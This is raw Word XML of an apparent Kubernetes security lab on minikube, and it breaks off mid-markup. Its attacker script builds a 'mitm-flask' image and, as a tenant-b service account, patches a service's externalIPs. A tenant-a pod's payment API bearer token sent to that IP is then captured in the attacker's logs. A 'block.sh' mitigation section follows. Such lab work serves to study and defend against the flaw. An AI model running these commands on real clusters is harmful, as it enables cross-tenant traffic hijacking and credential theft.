    <w:p w14:paraId="437F4D32" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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05C157FA" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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>kubectl apply -f attacker-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rbac.yaml</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6558B902" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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17BE5B7E" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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>kubectl -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n tenant</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-a create secret generic payment-api-token \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC8BB79" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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 xml:space="preserve">  --from-literal=API_TOKEN='SECRET_DATA_FROM_TENANT_A'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCD14D5" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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45A4FD3B" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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 xml:space="preserve">kubectl apply -f </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>victim.yaml</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="65938FB5" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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68FCF356" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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>kubectl -n tenant-a wait \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B100940" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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 xml:space="preserve">  --for=condition=Ready pod/victim \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566A3237" w14:textId="413FC261" w:rsidR="00F8334F" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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 xml:space="preserve">  --timeout=120s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488C1FDD" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00AA223A" w:rsidRDefault="00F07C9E" w:rsidP="00EB4A58">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A30121F" w14:textId="77777777" w:rsidR="00F65DFC" w:rsidRPr="00AA223A" w:rsidRDefault="00F65DFC" w:rsidP="00EB4A58">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03C10237" w14:textId="42AF3607" w:rsidR="00F07C9E" w:rsidRPr="00F07C9E" w:rsidRDefault="00EB4A58" w:rsidP="00F07C9E">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2 – attacker.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7EAB75" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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>cd app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C84792C" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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01298CBE" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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>docker build -t mitm-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flask:cve</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3208FCF6" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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1DDD3C17" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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>minikube image load mitm-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flask:cve</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4B5711B6" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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664F6305" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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>cd</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0E96AE8E" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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45B33B1A" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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 xml:space="preserve">kubectl apply -f </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attacker.yaml</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EF3329" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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 xml:space="preserve">  --as=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system:serviceaccount</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:tenant-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b:attacker</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7E8A4FC8" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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1B23AC16" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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>kubectl -n tenant-b get pods -o wide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428D885B" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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>kubectl -n tenant-b get svc -o wide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB4E605" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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>kubectl -n tenant-b get endpoints hijack-external-api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E93B4A" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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469447D2" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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>minikube ssh -n minikube-m03 "sudo crictl ps"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41941722" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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>kubectl -n tenant-b get svc hijack-external-api -o wide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69485701" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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>kubectl -n tenant-b get endpoints hijack-external-api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173EB189" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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B2D8506" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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>kubectl -n tenant-b patch service hijack-external-api \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C55101E" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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 xml:space="preserve">  --type=merge \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6658400A" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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 xml:space="preserve">  -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p '{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"spec</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>":{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"externalIPs</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>":[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"192.0.2.123</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"]}}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629DA442" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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 xml:space="preserve">  --as=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system:serviceaccount</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:tenant-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b:attacker</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="54B37601" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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03C2F223" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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 xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CFE029" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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>kubectl -n tenant-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exec victim -- \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D76E9F" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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 xml:space="preserve">  sh -c 'curl -sS -X POST \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BB888E" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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 xml:space="preserve">    -H "Authorization: Bearer $SECRET_DATA_FROM_TENANT_A" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D726B4E" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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 xml:space="preserve">    -H "Content-Type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698B6042" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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 xml:space="preserve">    -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d "{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\"amount\":</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100,\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"currency\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>":\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B5183F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B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>USD\"}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F8A469" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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 xml:space="preserve">    http://192.0.2.123:5000/v1/payments'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C82138" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00B5183F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1FA17CCF" w14:textId="13AF295A" w:rsidR="00EB4A58" w:rsidRPr="00B5183F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183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kubectl -n tenant-b logs deploy/mitm-flask --tail=30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023C7870" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRDefault="00F07C9E" w:rsidP="00F07C9E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43743EBC" w14:textId="54DAB795" w:rsidR="00F07C9E" w:rsidRDefault="00F07C9E" w:rsidP="00F07C9E">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07C9E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3 – block.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F30AEE" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRDefault="00F07C9E" w:rsidP="00F07C9E">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A9404F8" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kubectl create namespace security-admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8F7CF3" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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4AB974D5" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kubectl -n security-admin create serviceaccount security-admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C3E146" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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40A628B9" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">kubectl </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>create</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> clusterrolebinding security-admin-cluster-admin \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4175296F" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  --clusterrole=cluster-admin \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C35433" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  --serviceaccount=security-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin:security</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E82104D" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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6EB849C3" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kubectl auth can-i create validatingadmissionpolicies \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF2BE58" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  --as=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system:serviceaccount</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:security-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin:security</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317CFD3A" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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230B69F2" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kubectl -n tenant-b patch service hijack-external-api \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EC3485" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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65DFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  --type=merge \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA7905C" w14:textId="77777777" w:rsidR="00F07C9E" w:rsidRPr="00F65DFC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65DFC">
        <w:rPr>
